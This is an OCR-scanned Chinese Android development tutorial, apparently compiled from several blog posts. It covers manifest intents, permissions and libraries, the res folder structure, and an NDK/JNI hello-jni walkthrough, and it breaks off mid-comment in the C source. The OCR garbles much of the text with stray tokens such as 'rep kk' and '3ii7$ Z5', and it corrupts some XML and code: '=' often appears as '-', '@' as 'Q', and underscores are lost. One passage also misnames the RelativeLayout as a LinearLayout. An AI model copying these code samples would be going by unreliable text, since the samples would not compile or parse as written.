如 果 属 性 值 为 字符 串 ， 则 必须 使 用 双 反 斜 杠 (\) 转 义 字符 ， 例 如 ， 使 用 \ 表示 换行 符 或 使 用 


rep kk 


\\UXxxx 表示 Unicode 字符 。 


文件 功能 
下 文 介绍 在 清单 文件 中 体现 某 些 Android 特性 的 方式 。 


Intent 3ii7$ Z5 


应 用 的 核心 组 件 (例如 其 Activity、 服 务 和 广播 接收 器 ) 由 intent 激活 。Intent 是 一 系列 用 于 
描述 所 需 操作 的 信息 (Intent 对 象 ) ， 其 中 包括 要 执行 操作 的 数据 、 应 执行 操作 的 组 件 类 别 以 
及 其 他 相关 说 明 。Android 系统 会 查找 合适 的 组 件 来 响应 intent， 根 据 需 要 启动 组 件 的 新 实 
例 ， 并 将 其 传递 到 Intent 对 象 。 


组 件 将 通过 intent 过 滤器 公布 它们 可 响应 的 intent 类 型 。 由 于 Android 系统 在 启动 菜 组 件 之 前 
必须 了 解 该 组 件 可 以 处 理 的 intent， 因 此 intent 过 滤器 在 清单 中 被 指定 为 <intent-filter> 元 
素 。 一 个 组 件 可 有 任意 数量 的 过 滤器 ， 其 中 每 个 过 滤器 描述 一 种 不 同 的 功能 。 


显 式 命名 目标 组 件 的 intent 将 激活 该 组 件 ， 因 此 过 滤器 不 起 作用 。 不 按 名 称 指定 目标 的 intent 
只 有 在 能 够 通过 组 件 的 一 个 过 滤器 时 才 可 激活 该 组 件 。 


如 需 了 解 有 关 如 何 根据 intent 过 滤器 测试 Intent 对 象 的 信息 ， 请 参阅 Intent 和 Intent 过 滤器 
文档 。 


图 标 和 标签 


对 于 可 以 显示 给 用 户 的 小 图 标 和 文本 标签 ， 大量 元 素 具 有 icon 和 label 属性 。 此 外 ， 对 于 同 
样 可 以 显示 在 屏幕 上 的 较 长 说 明文 本 ， 某 些 元 素 还 具有 description 属性 。 例 

Jv > «permission» 元 素 具 有 所 有 这 三 个 属性 。 因 此 ， 当 系统 询问 用 户 是 否 授权 给 请 求 获得 权 
限 的 应 用 时 ， 权 限 图 标 、 权 限 名 称 以 及 所 需 信息 的 说 明 均 会 呈现 给 用 户 。 


无 论 何 种 情况 下 ， 在 包含 元 素 中 设置 的 图 标 和 标签 都 将 成 为 所 有 容器 子 元 素 的 默认 icon 和 
label 设置 。 因 此 ， 在 «applications 元 素 中 设置 的 图 标 和 标签 是 每 个 应 用 组 件 的 默认 图 标 和 
标签 。 同 样 ， 为 组 件 (例如 <activity> TK) 设置 的 图 标 和 标签 是 组 件 每 个 
<intent-filter> 元 素 的 默认 设置 。 如 果 <application> 元 素 设 置 标签 ， 但 是 Activity 及 其 
intent 过 滤器 不 执行 此 操作 ， 则 应 用 标签 将 被 视 为 Activity 和 intent 过 滤器 的 标签 。 


在 实现 过 滤器 公布 的 功能 时 ， 只 要 向 用 户 呈 现 组 件 ， 系 统 便 会 使 用 为 intent 过 滤器 设置 的 图 
标 和 标签 表示 该 组 件 。 例 如 ， 具 有 android.intent.action.MAIN 和 

android.intent. — aie 设置 的 过 滤器 将 Activity 公布 为 可 尼 动 应 用 的 功能 ， 即 ， 
公布 为 应 显示 在 应 用 启动 器 中 的 功能 。 在 过 滤器 中 设置 的 图 标 和 标签 显示 在 启动 器 中 。 


权限 


权限 是 一 种 限制 ， 用 于 限制 对 部 分 代码 或 设备 上 数据 的 访问 。 施 加 限制 是 为 了 保护 可 能 被 误 
用 以 致 破坏 或 损害 用 户 体 验 的 关键 数据 和 代码 。 


每 种 权限 均 由 一 个 唯一 的 标签 标识 。 标 签 通常 指示 受 限制 的 操作 。 以 下 是 Android 定义 的 一 
些 权 限 : 


android.permission.CALL EMERGENCY NUMBERS 
android.permission.READ OWNER DATA 
android.permission.SET WALLPAPER 
android.permission.DEVICE POWER 


一 个 功能 只 能 由 一 种 权限 保护 。 


如 果 应 用 需要 访问 受权 限 保护 的 功能 ， 则 必须 在 清单 中 使 用 <uses-permission> 元 素 声明 应 
用 需要 该 权限 。 将 应 用 安装 到 设备 上 之 后 ， 安 装 程 序 会 通过 检查 签署 应 用 证 书 的 颁发 机 构 并 
(在 菜 些 情 况 下 ) 询问 用 户 ， 确 定 是 否 授予 请 求 的 权限 。 如 果 授 予 权 限 ， 则 应 用 能 够 使 用 受 
保护 的 功能 。 和 否则 ， 其 访问 这 些 功能 的 尝试 将 会 失败 ， 并 且 不 会 向 用 户 发 送 任何 通知 。 


应 用 也 可 以 使 用 权限 保护 自己 的 组 件 。 它 可 以 采用 由 Android 定义 (如 
android.Manifest.permission 中 所 列 ) 或 由 其 他 应 用 声明 的 任何 权限 。 它 也 可 以 定义 自己 的 权 
限 。 新 权限 用 «permission» 元 素来 声明 。 例 如 ，Activity 可 受到 如 下 保护 : 


<manitest m e 
«permission android:name-"com.example.project.DEBIT ACCT" . . . /> 
«uses-permission android:name-"com.example.project.DEBIT ACCT" /> 


«application . . .> 
«activity android:name="com.example.project.FreneticActivity" 
android:permission-"com.example.project.DEBIT ACCT" 
oh 


</activity> 
</application> 
</manifest> 


请 注意 ， 在 此 示例 中 ， DEBIT_ACCT 权限 不 仅 是 通过 «permission» 元 素来 声明 ， 而 且 其 使 
用 也 是 通过 <uses-permission> 元 素来 请 求 。 要 让 应 用 的 其 他 组 件 也 能 够 启动 受 保护 的 
Activity， 您 必须 请 求 其 使 用 权限 ， 即 便 保护 是 由 应 用 本 身 施加 的 亦 如 此 。 


同样 还 是 在 此 示例 中 ， 如 果 将 permission 属性 设置 为 在 其 他 位 置 (例如 ， 
android.permission.CALL EMERGENCY NUMBERS) 声明 的 权限 ， 则 无 需 使 用 
<permission> 元 素 再 次 声 明 。 但 是 ， 仍 有 必要 通过 <uses-permission> 请 求 其 使 用 权限 © 


«permission-tree» 元 素 声明 为 代码 中 定义 的 一 组 权限 声明 命名 空间 ， <permission-group> 
为 一 组 权限 定义 标签 ， 包 括 在 清单 中 使 用 <permission> 元 素 声明 的 权限 以 及 在 其 他 位 置 声明 
的 权限 。 这 只 影响 如 何 对 提供 给 用 户 的 权限 进行 分 组 。 <permission-group> 元 素 并 不 指定 属 
于 该 组 的 权限 ， 而 只 是 为 组 提供 名 称 。 可 通过 向 <permission> 元 素 的 permissionGroup 属 
性 分 配 组 名 ， 将 权限 放 入 组 中 。 


库 


每 个 应 用 均 链 接 到 默认 的 Android 库 ， 该 库 中 包括 用 于 开发 应 用 (以 及 通用 类 ， 如 Activity ` 
服务 、intent、 视 图 、 按 钮 、 应 用 、ContentProvider) 的 基本 软件 包 。 


但 是 ， 某 些 软件 包 驻 留 在 自己 的 库 中 。 如 果 应 用 使 用 来 自 其 中 任 一 软件 包 的 代码 ， 则 必须 明 
确 要 求 其 链接 到 这 些 软件 包 。 清 单 必 须 包 含 单独 的 <uses-library> 元 素来 命名 其 中 每 个 库 。 
库 名 称 可 在 软件 包 的 文档 中 找到 。 


Reference 


https://developer.android.google.cn/guide/topics/manifest/manifest-intro.html 


原文 by coder-pig 


工程 项 目 结 构 解 析 : 


以 android studio (Eclipse + ADT) 举例 ， 我 们 开发 大 部 分 时 间 都 花 在 下 面 这 个 部 分 上 : 


mipmar 
mipmap-x 


mipmap-xxnap 


droidManifest.xml 





接 下 来 我 们 对 关键 部 分 进行 讲解 : 

java : 我 们 写 Java 代 码 的 地 方 ， 业 务 功 能 都 在 这 里 实现 

res : 存放 我 们 各 种 资源 文件 的 地 方 ， 有 图 片 ， 字 符 串 ， 动 画 ， 音 频 等 ， 还 有 各 种 形式 的 XML 
文件 


一 .res 资 源 文 件 夹 介绍 : 


说 到 这 个 res 目 录 ， 另 外 还 有 提 下 这 个 assets 目 录 ， 虽 然 这 里 没有 ， 但 是 我 们 可 以 自己 创建 ， 
两 者 的 区 别 在 于 是 否 前 者 下 所 有 的 资源 文件 都 会 在 R.java 文 件 下 生成 对 应 的 资源 jd， 而 后 者 并 
不 会 。 前 者 我 们 可 以 直接 通过 资源 jd 访问 到 对 应 的 资源 ， 而 后 者 则 需要 我 们 通过 
AssetManager 以 二 进 制 流 的 形式 来 读 取 。 这 个 R 文 件 可 以 理解 为 字典 ，res 下 每 个 资源 都 都 会 
在 这 里 生成 一 个 唯一 的 id 。 


接着 说 下 res 这 个 资源 目录 下 的 相关 目录 : 

下 述 mipmap 的 目录 ， 在 Eclipse 并 不 存在 这 个 ，Eclipse 中 都 是 drawable 开 头 的 ， 其 实 区 别 不 

大 ， 只 是 使 用 mipmap 会 在 图 片 缩放 在 提供 一 定 的 性 能 优化 ， 分 辩 率 不 同系 统 会 根据 屏幕 分 辩 
率 来 选择 hdpi，mdpi，xmdpi，xxhdpi 下 的 对 应 图 片 ， 所 以 你 解压 别人 的 apk 可 以 看 到 上 述 目 

录 同 一 名 称 的 图 片 ， 在 四 个 文件 夹 下 都 有 ， 只 是 大 小 和 像素 不 一 样 而 已 。 当 然 ， 这 也 不 是 绝 

对 的 ， 比 如 我 们 把 所 有 的 图 片 都 丢 在 了 drawable-hdpi 下 的 话 ,即使 手机 本 该 加 载 Idpi 文 件 夹 下 


的 图 片 资源 ， 但 是 Idpi 下 没有 ， 那 么 加 载 的 还 会 是 hdpi 下 的 图 片 。 另 外 ,还 有 一 种 情况 :比如 是 
hdpi、mdpi 目 录 下 有 ，Idpi 下 没有 ， 那 么 会 加 载 mdpi 中 的 资源 ， 原 则 是 使 用 最 接近 的 密度 级 

别 。 如 果 你 想 禁 止 Android 不 跟随 屏幕 密度 加 载 不 同文 件 夹 的 资源 ,只 需 在 AndroidManifest.xml 
文件 中 添加 android:anyDensity="false" 字段 即 可 。 


1. 图 片 资源 


drawable : 存放 各 种 位 图 文件 ，(.png，.jpg，.9png，.gif 等 ) 除 此 之 外 可 能 是 一 些 其 他 的 
drawable 类 型 的 XML 文件 

mipmap-hdpi : 高 分 辨认 ， 一 般 我 们 把 图 片 丢 这 里 

mipmap-mdpi : FETJE > RY > 除非 兼容 的 的 手机 很 昌 

mipmap-xhdpi : 超 高 分 辩 率 ， TURA TEMA 越 来 越 好 ， 以 后 估计 会 慢 慢 往 这 里 过 渡 
mipmap-xxhdpi : 超 超 高 分 辩 率 ， 这 个 在 高 端 机 上 有 了 所 体现 


layout : 该 目录 下 存放 的 就 是 我 们 的 布局 文件 ， 另 外 在 一 些 特定 的 机 型 上 ， 我 们 做 屏幕 适 配 ， 
比如 480*320 这 样 的 手机 ， 我 们 会 另外 创建 一 套 布局 就 行 ， 如 layout-480x320 这 样 的 文件 
$ o 


3. 菜 单 资源 


menu : 在 以 前 有 物理 菜单 按钮 ， 即 menu 键 的 手机 上 ， 用 的 较 多 ， 现 在 用 的 并 不 多 ， 菜 单项 
相关 的 资源 Xml 可 在 这 里 编写 ， 不 知道 谷歌 会 不 会 出 新 的 东西 来 替代 菜单 了 。 


4.values 目 录 


demens.xml : 定义 尺寸 资源 

string.xml : 定义 字符 串 资源 

styles.xml : 定义 样式 资源 

colors.xml : 定义 颜色 资源 

arrays.xml : 定义 数组 资源 

attrs.xml : 自 定义 控件 时 用 的 较 多 ， 自 定义 控件 的 属性 

theme 主 题 文 件 ， 和 styles 很 相似 ， 但 是 会 对 整个 应 用 中 的 Actvitiy 或 指定 Activity 起 作用 ， 一 般 
是 改变 窗口 外 观 的 。 

可 在 Java 代 码 中 通过 setTheme 使 用 ， 或 者 在 Androidmanifest.xml 中 为 «application...» 添加 
theme 的 属性 。 

你 可 能 看 到 过 这 样 的 values 目 录 : values-w820dp，values-v11 等 ， 前 者 WwW 代表 平 板 设备 ， 
820dp 代 表 屏 幕 宽 度 ; 而 v11 这 样 代表 在 API(11)， 即 android 3.0 后 才 会 用 到 的 。 


5.raw H 3k 


用 于 存放 各 种 原生 资源 (音频 ， 视 频 ， 一 些 XML 文 件 等 )， 我 们 可 以 通过 openRawResource(int 
id) 来 获得 资源 的 二 进 制 流 。 其 实 和 和 Assets 差不多， 不 过 这 里 面 的 资源 会 在 R 文 件 那 里 生成 一 个 
资源 id 而 已 。 
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动画 有 两 种 : 属性 动画 和 补 间 动画 : 
animator : 存放 属性 动画 的 XML 文件 
anim : 存放 补 间 动画 的 XML 文件 


二 .如 何 去 使 用 这 些 资 源 


咽 ， 知 道 有 什么 资源 ， 接 下 来 就 来 了 解 该 怎么 o 前面 也 说 了 ， 我 们 所 有 的 资源 文件 都 会 
在 R.java 文 件 下 生成 一 个 资源 id， 我 们 可 以 通过 这 个 资源 id 来 完成 资源 的 访问 ， 使 用 情况 有 两 
ft : Java 代 码 中 使 用 和 XML 代码 中 使 用 


Java 代 码 中 使 用 


Java 文字 : txtName.setText(getResources().getText(R.string.name) ); 
图 片 : imgIcon.setBackgroundDrawableResource(R.drawable. icon); 

颜色 : txtName.setTextColor(getResouces().getColor(R.color.red)); 
布局 : setContentView(R.layout.main); 

控件 : txtName = (TextView)findViewById(R.id.txt name); 


XML 代码 中 使 用 


通过 @XXX 即 可 得 到 ， 上 比如 这 里 获取 文本 和 图 片 : 
<TextView android:text="@string/hello world" android: layout_width="wrap_content" andro 
id: layout_height="wrap_content" android:background = "@drawable/img_back"/> 


ERA T BASS : 


好 了 ， 接 下 来 我 们 就 要 剖析 工程 里 三 个 比较 重要 的 文件 : 
主体 代码 : MainActivity.java 
布局 文件 : activity_main 


Android 工程 相关 文件 说 明 


Android 配 置 文件 : AndroidManifest.xml (图 片 内 容 可 能 有 点 差距 ) 


3 @ 1.HelloAndroid.java 








昌国 2. 布 局 文件 :main.xml 





d @ 3.AndroidManifest.xml 


http://DIOg. csan. net/coder pig 
MainActivity.java 代码 如 下 : 


package jay.com.example.firstapp; 


import android.support.v7.app.AppCompatActivity; 
import android.os.Bundle; 


public class MainActivity extends AppCompatActivity { 
@Override 
protected void onCreate(Bundle savedInstanceState) { 
super.onCreate(savedInstanceState); 
setContentView(R.layout.activity main); 


代码 分 析 : 


CEN T 
MainActivity 


布局 文件 : activity_main.xml， 代码 如 下 : 
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Android 工程 相关 文件 说 明 


<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" 
xmlns:tools="http://schemas.android.com/tools" 
android: layout_width="match_parent" 
android:layout height-"match parent" 
tools:context=".MainActivity"> 


<TextView 
android: layout_width="wrap_content" 
android:layout height-"wrap content" 
android:text-"Qstring/hello world" /> 


</RelativeLayout> 


代码 分 析 : 
我 们 定义 了 一 个 LinearLayout 线 性 布局 ， 在 xml 命 名 空间 中 定义 我 们 所 需要 使 用 的 架构 ,来 自 于 





AndroidManifest.xml 配 置 文件 ， 代 码 如 下 : 
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Android 2# 


<?xml version="1.0" encoding="utf -8"?> 
«manifest xmlns:android-"http://schemas.android.com/apk/res/android" 
package="jay.com.example.firstapp" > 


<application 
android:allowBackup="true" 
android:icon-"Qmipmap/ic launcher" 
android: label="@string/app_name" 
android: theme="@style/AppTheme" > 
<activity 
android:name=".MainActivity" 
android: label="@string/app_name" > 
<intent-filter> 
<action android:name="android.intent.action.MAIN" /> 


«category android:name="android.intent.category.LAUNCHER" /> 
</intent-filter> 
</activity> 
</application> 


</manifest> 


代码 分 析 : 


manifest 









users-sdk 


Application 





Activity 





Intent-filter( 意 图 过 滤器 ) 





O1 | 


C1 


除了 上 述 内 容 外 : 

如 果 app 包 含 其 他 组 件 的 话 ,都 要 使 用 类 型 说 明 语法 在 该 文件 中 进行 声明 

Server :<server> 元 素 BroadcastReceiver<receiver> 元 素 ContentProvider<provider> 元 

素 IntentFilter<intent-filter> 元 素 </provider></receiver ></server> 

@ 权 限 的 声明 : 在 该 文件 中 显 式 地 声明 程序 需要 的 权限 ， 防 止 app 错 误 地 使 用 服务 ， 不 恰当 地 
访问 资源 ， 最 终 提高 android app 的 健壮 性 。android.permission.SEND_SMS 4 3x 4 i$ AT 
app 需 要 使 用 发 送信 息 的 权限 ， 安 装 的 时 候 就 会 提示 用 户 ， 相 关 权 限 可 以 在 sdk 参 考 手 册 查 
找 。 


Reference 


http://blog.csdn.net/coder_pig/article/details/46963725 


原文 by hibraincol 


JNI 简介 


JNI 全 称 是 Java Native Interface (Java 本 地 接口 ) 单词 首 字 母 的 缩写 ， 本 地 接口 就 是 指 用 C 
和 C++ 开发 的 接口 。 由 于 INI 是 JVM 规范 中 的 一 部 份 ， 因 此 可 以 将 我 们 写 的 INI 程序 在 任 
何 实现 了 JNI 规 范 的 Java 虚拟 机 中 运行 。 同 时 ， 这 个 特性 使 我 们 可 以 复 用 以 前 用 C/C++ 写 
的 大 量 代码 。 

开发 JNI 程 序 会 受到 系统 环境 的 限制 ， 因 为 用 C/C++ 语言 写 出 来 的 代码 或 模块 ， 编 译 过 程 当 
中 要 依赖 当前 操作 系统 环境 所 提供 的 一 些 库 函 数 ， 并 和 本 地 库 链 接 在 一 起 。 而 且 编 译 后 生成 
的 二 进 制 代码 只 能 在 本 地 操作 系统 环境 下 运行 ， 因 为 不 同 的 操作 系统 环境 ， 有 自己 的 本 地 库 
和 CPU 指令 集 ， 而 且 各 个 平台 对 标准 C/C++ 的 规范 和 标准 库 函 数 实现 方式 也 有 所 区 别 。 这 
就 造成 使 用 了 INI 接口 的 JAVA 程序 ， 不 再 像 以 前 那样 自由 的 跨 平台 。 如 果 要 实现 跨 平台 ， 就 
必须 将 本 地 代码 在 不 同 的 操作 系统 平台 下 编译 出 相应 的 动态 库 。 


INI 开发 流程 主要 分 为 以 下 6 步 : 


e 编写 声明 了 native 方法 的 Java 类 

e 将 Java 源 代码 编译 成 class 字 节 码 文 件 

e 用 javah -jni 命令 生成 .h 头 文件 (javah X jdk 自 带 的 一 个 命令 ，-jni 参数 表示 将 class 中 
Fl native 声明 的 函数 生成 JNI 规则 的 函数 ) 

e 用 本 地 代码 实现 .h 头 文件 中 的 元 数 

e 将 本 地 代码 编译 成 动态 库 ( Windows : N*.dll* linux/unix : \*.so’mac os x: \*.jnilib ) 

e 拷贝 动态 库 至 java.library.path 本 地 库 搜索 目录 下 ， 并 运行 Java 程序 


Android NDK 开发 基础 

















Í; 
Create a class 
that declares the 
native method 


Hel loWorld.java 

















2. 3. 
Use javac Use javah to 
to compile the generate header 
program file 


Helloworld.h 
HelloWworld.class a 


4. 
Ta write the C 
implementation 
of the native 
method 








Hel loWorld.c 







3: 

Compile C 
code and generate 
native library 


6. 
Run the 
program using 
the java 
interpreter 
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(美语 : native development kit， 简 称 NDK) 是 一 种 基于 原生 程序 接口 的 软件 开发 工具 。 通 
过 此 工具 开发 的 程序 直接 以 本 地 语言 运行 ， 而 非 虚拟 机 。 因 此 只 有 java 等 基于 虚拟 机 运行 的 语 
言 的 程序 才 会 有 原生 开发 工具 包 。[ 维 基 百 科 ] 


NDK 提 供 了 一 系列 的 工具 ， 帮 助 开发 者 快速 开发 C (ACH) 的 动态 库 ， 并 能 自动 将 so 和 java 
应 用 一 起 打包 成 apk。 这 些 工具 对 开发 者 的 帮助 是 巨大 的 .NDK 集 成 了 交叉 编译 器 ， 并 提供 了 
相应 的 mk 文件 隔离 CPU、 平 台 、ABl 等 差异 ， 开 发 人 员 只 需要 简单 修改 mk 文件 〈 指 出 “哪些 文 
件 需 要 编译 "\“ 编 译 特 性 要 求 " 等 ) ， 就 可 以 创建 出 so。 


NDK 可 以 自动 地 将 so 和 Java 应 用 一 起 打包 ， 极 大 地 减轻 了 开发 人 员 的 打包 工作 。 


Android NDK 的 platforms\<android #&#>\arch-arm\usr\include\jni.h 头 文件 中 ， 声 明了 所 
有 可 以 使 用 到 的 JNI 接口 函数 。 该 文件 有 两 个 重要 的 结构 体 JNINativelnterface 和 
JNIInvokelnterface > JNINativelnterface 是 JNI 本 地 接口 ， 实 际 上 它 是 一 个 接口 函数 指针 表 ， 
里 面 每 一 项 都 为 JNI 接口 的 函数 指针 ， 所 有 的 原生 代码 都 可 以 调用 这 些 接口 函数 ; 而 
JNIInvokelnterface 则 是 JNI 调用 接口 ， 该 结构 目前 只 有 3 个 保留 项 与 5 个 函数 指针 ， 这 5 个 函 
数 用 于 访问 全 局 的 JNI 接口 ， 多 用 于 原生 多 线程 程序 开发 。 


#if defined(  cplusplus) 

typedef | JNIEnv JNIEnv; 

typedef _JavaVM JavaVM; 

#else 

typedef const struct JNINativeInterface* JNIEnv; 
typedef const struct JNIInvokeInterface* JavaVM; 
#endif 


如 果 使 用 C++ 代码 来 调用 JN| 接口 函数 ，JNIEnv 被 定义 成 JNIEnv 结构 体 ， 该 结构 体 的 第 一 
个 字段 就 是 一 个 JNINativelnterface 结构 体 的 指针 。 如 果 是 C 代码 调用 JNI 接口 函数 ，JNIEnv 
则 直接 定义 为 JNINativelnterface 结构 体 的 指针 。 因 此 ， 可 以 把 JNIEnv 的 首 地 址 解释 为 
JNINativelnterface 的 首 地 址 来 使 有 用， 那么 通过 首 地 址 如 上 索引 值 就 能 够 找到 具体 需要 调用 的 
JNI 接口 函数 ， 每 个 函数 地 址 占有 4 个 字 节 的 空间 。 


NDK 两 种 开发 模式 
ndk-build 形式 ; Android Studio 2.2 之 前 的 模式 


CMake 形式 : CLion C/C++ 编辑 器 ; AS2.2 之 后 整合 了 CLion 人 代码, AS 就 支持 了 CMake 形 式 的 
NDK 开 发 


为 何 要 用 到 NDK 
概括 来 说 主要 分 为 以 下 几 种 情况 : 


1， 代 码 的 保护 ， 由 于 apk 的 java 层 代码 很 容易 被 反 编译 ， 而 C/C++ 库 反 汇 难 度 较 大 。 


2. 在 NDK 中 调用 第 三 方 C/C++ 库 ， 因 为 大 部 分 的 开源 库 都 是 用 C/C++ 代 码 编写 的 。 
3. 便于 移植 ， 用 C/C++ 写 得 库 可 以 方便 在 其 他 的 花 入 式 平台 上 再 次 使 用 。 
下 面 就 介绍 下 Android NDK 的 入 门 学 习 过 程 : 


入 门 的 最 好 办 法 就 是 学 习 Android 自 带 的 例子 ， 这 里 就 通过 学 习 Android 的 NDK 自 带 的 demo 程 
序 : hello-jni 来 达到 这 个 目的 。 


一 、 开 发 环境 的 搭建 


安装 android-ndk 开 发 包 ， 这 个 开发 包 可 以 在 google android 官网 下 载 ， 通 过 这 个 开发 包 的 工 
具 才 能 将 android jni 的 C/C++ 的 代码 编译 成 库 。 

android 应 用 程序 开发 环境 : 包括 eclipse、java、 android sdk、adt， 安 装 完 之 后 ， 需 要 将 
android-ndk 的 路 径 加 到 环境 变量 PATH 中 : 


sudo gedit /etc/environment 


在 environment 的 PATH 环境 变量 中 添加 你 的 android-ndk 的 安装 路 劲 ， 然 后 再 让 这 个 更 改 的 环 
境 变量 立即 生效 : 


source /etc/environment 
BUT LRG RR: BESTT A : 
ndk-bulid 


弹出 如 下 的 错误 ， 而 不 是 说 ndk-build not found， 就 说 明 ndk 环 境 已 经 安装 成 功 了 。 


Android NDK: Could not find application project directory ! 

Android NDK: Please define the NDK_PROJECT_PATH variable to point to it. 
/home/braincol/workspace/android/android-ndk-r5/build/core/build-local.mk:85: *** Andr 
oid NDK: Aborting . Stop. 


二 、 代 码 的 编写 


1. 首 先是 写 java 代 码 
建立 一 个 Android 应 用 工程 HelloJni， 创建 HelloJni.java 文 件 : 


HelloJni.java : 


Android NDK 开发 基础 


VS 
* Copyright (C) 2009 The Android Open Source Project 
* 
* Licensed under the Apache License, Version 2.0 (the "License"); 
* you may not use this file except in compliance with the License. 
* You may obtain a copy of the License at 
* 
e http://www.apache.org/licenses/LICENSE-2.0 
* 
* Unless required by applicable law or agreed to in writing, software 
* distributed under the License is distributed on an "AS IS" BASIS, 
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
* See the License for the specific language governing permissions and 
* limitations under the License. 
* 


/ 
package com.example.hellojni; 


import android.app.Activity; 
import android.widget.TextView; 
import android.os.Bundle; 


public class HelloJni extends Activity 

{ 
/** Called when the activity is first created. */ 
@Override 
public void onCreate(Bundle savedInstanceState) 


f 


super.onCreate(savedInstanceState); 


/* Create a TextView and set its content. 
* the text is retrieved by calling a native 
* function. 
57 
TextView tv - new TextView(this); 
tv.setText( stringFromJNI() ); 
setContentView(tv); 


} 


/* A native method that is implemented by the 
* 'hello-jni' native library, which is packaged 
* with this application. 
“if 

public native String stringFromJNI(); 


/* This is another native method declaration that is *not* 
* implemented by 'hello-jni'. This is simply to show that 
* you can declare as many native methods in your Java code 
* as you want, their implementation is searched in the 

* currently loaded native libraries only the first time 

* you call them. 
* 
* 
* 
* 


Trying to call this function will result ina 
java.lang.UnsatisfiedLinkError exception ! 
/ 

public native String unimplementedStringFromJNI(); 


/* this is used to load the 'hello-jni' library on application 
* startup. The library has already been unpacked into 
* /data/data/com.example.HelloJni/lib/libhello-jni.so at 
* installation time by the package manager. 
WA 
static { 
System. loadLibrary("hello-jni"); 
} 


这 段 代码 很 简单 ， 注 释 也 很 清晰 ， 这 里 只 提 两 点 : : 
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static{ 
System. loadLibrary("hello-jni"); 
} 


表明 程序 开始 运行 的 时 候 会 加 载 hello-jni, static 区 声明 的 代码 会 先 于 onCreate 方 法 执行 。 如 果 
你 的 程序 中 有 多 个 类 ， 而 且 如 果 HelloJni 这 个 类 不 是 你 应 用 程序 的 入 口 ， 那 么 hello-jni (完整 
的 名 字 是 libhello-jni.so) 这 个 库 会 在 第 一 次 使 用 HelloJni 这 个 类 的 时 候 加 载 。 


public native String stringFromJNI(); 
public native String unimplementedStringFromJNI(); 


可 以 看 到 这 两 个 方法 的 声明 中 有 native 关键 字 ， 这 个 关键 字 表示 这 两 个 方法 是 本 地 方法 ， 也 
就 是 说 这 两 个 方法 是 通过 本 地 代码 (C/C++) 实现 的 ， 在 java 代 码 中 仅仅 是 声明 。 


用 eclipse 编 译 该 工程 ， 生 成 相应 的 ,class 文件 ， 这 步 必 须 在 下 一 步 之 前 完成 ， 因 为 生成 .h 文 件 
需要 用 到 相应 的 .class 文 件 。 


45 78 5 AJ CIC IS 
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2.1 生成 相应 .h 文 件 : 


就 拿 我 这 的 环境 来 说 ， 首 先 在 终端 下 进入 刚刚 建立 的 HelloJni 工 程 的 目录 : 


braincol@ubuntu:~$ cd workspace/android/NDK/hello-jni/ 


ls 查看 工程 文件 


braincolQubuntu:-/workspace/android/NDK/hello-jni$ 1s 
AndroidManifest.xml assets bin default.properties gen res src 


可 以 看 到 目前 仅仅 有 几 个 标准 的 android 应 用 程序 的 文件 (3) 。 


首先 我 们 在 工程 目录 下 建立 一 个 jni 文 件 夹 : 


braincol@ubuntu:~/workspace/android/NDK/hello-jni$ mkdir jni 
braincolQubuntu:-/workspace/android/NDK/hello-jni$ ls 
AndroidManifest.xml assets bin default.properties gen jni res src 


下 面 就 可 以 生成 相应 的 .h 文 件 了 : 


braincol@ubuntu:~/workspace/android/NDK/hello-jni$ javah -classpath bin -d jni com.example 


-classpath bin : 表示 类 的 路 径 


-d jni: 表示 生成 的 头 文件 存放 的 目录 
com.example.hellojni.HelloJni 则 是 完整 类 名 


这 一 步 的 成 功 要 建立 在 已 经 在 bin/com/example/hellojni/ 目录 下 生成 了 HelloJni.class 的 基础 
xe 


现在 可 以 看 到 jni 目 录 下 多 了 个 .h 文 件 : 


braincol@ubuntu:~/workspace/android/NDK/hello-jni$ cd jni/ 
braincolQubuntu:-/workspace/android/NDK/hello-jni/jni$ ls 
com example hellojni HelloJni.h 


我 们 来 看 看 com example hellojni HelloJni.h 的 内 容 : 


com example hellojni HelloJni.h : 


/* DO NOT EDIT THIS FILE - it is machine generated */ 
#include <jni.h> 
/* Header for class com_example_hellojni_HelloJni */ 


#ifndef Included com example hellojni HelloJni 
#define Included com example hellojni HelloJni 
#ifdef _ cplusplus 

extern "C" [f 


#endif 
yi 
* Class: com example hellojni HelloJni 
* Method: stringFromJNI 
* Signature: ()Ljava/lang/String; 
i 


JNIEXPORT jstring JNICALL Java com example hellojni HelloJni stringFromJNI 
(JNIEnv *, jobject); 


Js 
SS com example hellojni HelloJni 
* Method: unimplementedStringFromJNI 
* Signature: ()Ljava/lang/String; 
iA 


JNIEXPORT jstring JNICALL Java com example hellojni HelloJni unimplementedStringFromJNI 
(JNIEnv *, jobject); 

#ifdef _ cplusplus 

} 


#endif 
#endif 


EE = 


上 面 代码 中 的 JNIEXPORT 和 JNICALL 是 jni 的 宏 ， 在 android 的 jni 中 不 需要 ， 当 然 写 上 去 也 不 


会 有 错 。 


从 上 面 的 源码 中 可 以 看 出 这 个 函数 名 那 是 相当 的 长 ， 不 过 还 是 很 有 规律 的 ， 完 全 按 


照 : java pacakege class mathod 形式 来 命名 。 


也 就 是 说 : 


Hello.java? stringFromJNI() 方法 对 应 于 C/C++ 中 的 Java com example hellojni HelloJni stri 
ngFromJNI() 方法 


HelloJni.java? 4 unimplementedStringFromJNI() 方法 对 应 于 C/C++ 中 的 Java com example hell 
ojni HelloJni unimplementedStringFromJNI() 方法 


注意 下 其 中 的 注释 : 


Signature: ()Ljava/lang/String; 


()Ljava/lang/String; 


() 表 示 函 数 的 参数 为 空 (这 里 为 空 是 指 除了 JNIEnv *, jobject 这 两 个 参数 之 外 没有 其 他 参 
数 ， JNIEnv*, jobject 是 所 有 jni 函 数 必 有 的 两 个 参数 分 别 表示 jni 环境 和 对 应 的 java 类 (或 
对 象 ) 本 身 ) ， 


Ljava/lang/String; 表示 函数 的 返回 值 是 java 的 String 对 象 。 


2.2 编写 相应 的 .c 文 件 : 


hello-jni.c : 
[he 
* Copyright (C) 2009 The Android Open Source Project 
* 
* Licensed under the Apache License, Version 2.0 (the "License"); 
* you may not use this file except in compliance with the License. 
* You may obtain a copy of the License at 
* 
a http://www.apache.org/licenses/LICENSE-2.0 
* 
* Unless required by applicable law or agreed to in writing, software 
* distributed under the License is distributed on an "AS IS" BASIS, 
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
* See the License for the specific language governing permissions and 
* limitations under the License. 
* 
* 


SN 


#include <string.h> 
#include <jni.h> 


/* This is a trivial JNI example where we use a native method 
* to return a new VM String. See the corresponding Java source 
